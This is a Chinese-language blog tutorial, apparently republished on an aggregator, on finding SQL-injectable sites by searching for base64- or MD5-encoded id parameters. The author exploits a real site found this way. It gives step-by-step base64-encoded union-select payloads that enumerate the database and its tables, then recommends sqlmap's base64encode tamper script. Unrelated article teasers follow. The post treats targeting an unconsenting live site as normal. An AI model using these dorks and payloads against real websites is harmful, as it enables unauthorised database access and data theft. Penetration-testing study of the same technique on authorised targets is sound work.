SQL注入思路扩展

news2025/1/15 13:10:24

目录

一、资产搜集

二、开始sql注入常规流程

三、sqlmap验证

总结:测试sql注入的时候不要只局限于明文传输,也要注意编码或者加密后的值。

                 还没看够?欢迎关注,带你走进黑客世界,下面也有免费的靶场视频


一、资产搜集

我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于inurl:.php?id=1,可以额外的尝试搜搜1的base64编码值MQ==,即可以搜索inurl:.php?id=MQ==,或者搜索1的md5加密值,即可以搜索inrul:.php?id=a0b923820dcc509a。这样子搜索完,我们可测试的范围就扩大了。此处我就是利用inurl:.php?id=MQ==搜索到了一处存在sql注入的网站。

图片

二、开始sql注入常规流程

(1)判断字符型还是数字型

 
  1. ?id=MQ== (原始值为1)

  2. ?id=MeKAmQ== (原始值为1')

图片


 

图片


从这两者的反应可以判断出是数字型。
(2)判断是否存在sql注入漏洞

 
  1. ?id=MSBhbmQgMT0x (原始值1 and 1=1) 有内容

  2. ?id=MSBhbmQgMT0y (原始值1 and 1=2) 没有内容,页面下方空白

图片


 

图片


可以判断出此处可能存在sql注入。
(3)判断列数

 
  1. ?id=MSBvcmRlciBieSAz (原始值1 order by 3) 页面内容正常输出

  2. ?id=MSBvcmRlciBieSA0 (原始值1 order by 4) 报错

图片


 

图片


可以判断列数为3。
(4)判断显错位。

 
  1. ?id=LTEgdW5pb24gc2VsZWN0IDEsMiwz (原始值-1 union select 1,2,3)

图片


显错位为2和3。
(5)在显错位2的位置上尝试获取当前数据库

 
  1. ?id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwz (原始值-1 union select 1,database(),3)

图片


(6)获取当前数据库中的表

 
  1. id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgp

  2. 原始值:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

图片


(7)接下来就是获取其中某一个表的字段名和字段值了,只需将相应的SQL语句进行BASE64编码,然后输入即可。
 

图片

三、sqlmap验证

由于传参是需要进行base64编码的,所以此处我们在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上--tamper base64encode.py即可。
 

图片


 

图片


 

图片

图片

总结:测试sql注入的时候不要只局限于明文传输,也要注意编码或者加密后的值。

                 还没看够?欢迎关注,带你走进黑客世界,下面也有免费的靶场视频

 免费领取安全学习资料包!一起学习,共同进步icon-default.png?t=N7T8https://docs.qq.com/doc/DRGJHbUxpTWR2Y3lq

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1154676.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

HCIA --- 综合实验(结束)

一、实验拓扑及要求 二、整体IP规划 三、解决方案 四、解决步骤配置命令 一、基本部分 一、交换机 1、创建对应VLAN,对应接口划入对应VLAN中,创建Trunk干道,配置HTTP服务器IP LSW1 [sw1]vlan batch 2 to 3 [sw1]interface e0/0/1 [sw1-E…

idea提交代码一直提示 log into gitee

解决idea提交代码一直提示 log into gitee问题 文章目录 打开setting->Version control->gitee,删除旧账号,重新配置账号,删除重新登录就好 打开setting->Version control->gitee,删除旧账号,重新配置账号,删除重新登…

部署前端项目到宝塔面板(腾讯阿里服务器均适用)

写在前面,本网站部署的是前端nuxt.js项目,后端部分在本人的其他博文,请移步 【起步】服务器端 打开自己的轻量服务器的管理面板 确保服务器已经打开,如下图所示 来到域名列表,解析域名,如下图所示 的…

[转载]C++序列化框架介绍和对比

Google Protocol Buffers Protocol buffers 是一种语言中立,平台无关,可扩展的序列化数据的格式,可用于通信协议,数据存储等。 Protocol buffers 在序列化数据方面,它是灵活的,高效的。相比于 XML 来说&…

怎么理解电流超前电压、电压超前电流?

电容和电感,电压超前电流,电流超前电压都是我们经常听到的。作为非专业人士,这些听起来确实有点摸不着头脑,今天特别查了下电容、电感、电压电流相关资料,总算是弄明白了,在此特地记录下! 1. 电…

打造企业级门户,WorkPlus助您打造个性化与高效的企业通讯平台

在现代企业运营中,良好的内部沟通与信息管理至关重要。为满足企业对于高效沟通与信息发布的需求,WorkPlus推出了企业门户APP,为企业提供全新的信息管理与沟通协作体验。 作为一站式企业门户,WorkPlus连接了组织、员工和信息的纽带…

GitLab(2)——Docker方式安装Gitlab

目录 一、前言 二、安装Gitlab 1. 搜索gitlab-ce镜像 2. 下载镜像 3. 查看镜像 4. 提前创建挂载数据卷 5. 运行镜像 三、配置Gitlab文件 1. 配置容器中的/etc/gitlab/gitlab.rb文件 2. 重启容器 3. 登录Gitalb ① 查看初始root用户的密码 ② 访问gitlab地址&#…

阿里云国际版和国内版的区别是什么,为什么很多人喜欢选择国际版?

阿里云国际版和国内版区别如下: 谈到区别,我们不妨先来对比下相同点与不同点,才能清晰明确的知道二者区别 下面先介绍不同点: 面向市场更广泛 阿里云国际版主要是面向国际(全球)客户的,而国内…

如何用ChatGPT快速写出一份合格的PPT报告

我们【AI写稿专家】的小伙伴中有很多企业高管和公务员,大家经常有写报告写ppt的需求,下面小编给大家介绍一下我们新发布生成PPT的功能,很简单很方便,看完大家不到1分钟就能生成一份拿得出手的PPT报告,再也不用费尽心思…

华为云之使用CCE云容器引擎部署Nginx应用【玩转华为云】

华为云之使用CCE云容器引擎部署Nginx应用【玩转华为云】 一、本次实践介绍1.本次实践简介2.本次实践目的 二、CEE介绍1.CCE简介2.CCE产品链接 三、创建虚拟私有云VPC1.访问VPC2.创建VPC3.查看VPC列表 四、创建密钥对1.进入密钥对界面2.创建密钥对3.保存密钥文件到本地 五、创建…

Softing dataFEED OPC Suite将西门子PLC数据存储到Oracle数据库中

一 背景 现代工业产品生产批量大、过程自动化程度高,这对于用户追溯产品设计与制造过程中产生的数据而言,无疑是一大新挑战。与此同时,制造商们对产品制造过程中产生的大量工艺数据也愈发重视,并在不断寻求存储与分析产品制造数据…

【zTree】节点添加不同操作按钮,点击后生成弹窗

zTree api 文档:https://www.treejs.cn/v3/api.php 1. 初始化树的配置项 const initZtreeSetting () > {const setting {view: {addHoverDom: addHoverDom, // 显示用户自定义控件selectedMulti: false,// 是否允许同时选中多个节点,默认为truesh…

HarmonyOS鸿蒙原生应用开发设计- 隐私声明

HarmonyOS设计文档中,为大家提供了独特的隐私声明,开发者可以根据需要直接引用。 开发者直接使用官方提供的隐私声明内容,既可以符合HarmonyOS原生应用的开发上架运营规范,又可以防止使用别人的内容产生的侵权意外情况等&#xff…

程序开发官网地址汇总

这里写目录标题 官网地址汇总开发环境开发工具数据库驱动包其他 官网地址汇总 开发环境 1 JDK :https://www.oracle.com/java/technologies/java-se-glance.html 2 Maven:https://maven.apache.org/download.cgi 3 Maven Repository: https://mvnrep…

启动U盘制作工具------------Ventoy 最新版 v1.0.96

Ventoy最新版是一款功能强大的启动U盘制作工具,Ventoy最新版支持多系统启动盘的制作功能,Ventoy最新版一次还可以拷贝很多个不同类型的ISO文件,软件支持自动安装部署、支持超过4GB的ISO文件、支持大部分常见操作系统和无差异支持Legacy+UEFI模式。软件能够直接启动WIM文件。…

搜索语法备忘

搜索途径 传统搜索引擎:Goolge、Bing、Sogou、Baidu微信搜一搜视频内容:哔哩哔哩、抖音AI:文言一心、ChatGPT 传统搜索引擎中,Goolge 和 Sogou 可以搜索到微信公众号的内容。这很重要,根据我的主观感受,微…

PSP - 蛋白质复合物 AlphaFold2 Multimer MSA Pairing 逻辑与优化

欢迎关注我的CSDN:https://spike.blog.csdn.net/ 本文地址:https://spike.blog.csdn.net/article/details/134144591 在蛋白质复合物结构预测中,当序列 (Sequence) 是异源多链时,无论是AB,还是AABB,都需要 …

Python实现hellokitty

目录 系列文章 前言 绘图基础 HelloKitty 尾声 系列文章 序号文章目录直达链接1浪漫520表白代码https://want595.blog.csdn.net/article/details/1306668812满屏表白代码https://want595.blog.csdn.net/article/details/1297945183跳动的爱心https://want595.blog.csdn.n…

山西电力市场日前价格预测【2023-11-01】

日前价格预测 预测说明: 如上图所示,预测明日(2023-11-01)山西电力市场全天平均日前电价为280.90元/MWh。其中,最高日前电价为420.61元/MWh,预计出现在18:00。最低日前电价为0.00元/MWh,预计出…

LIS系统解决了实验室的哪些问题?

LIS实验室管理系统源码 LIS系统全套源码 LIS系统解决了实验室的哪些问题? 1、普遍存在的标本送错及标本不合格问题 现状:实验室标本的分送由护工完成,通常会由于疏忽等原因导致标本与原来裹在外面的申请单搞错,有时还会送错标本…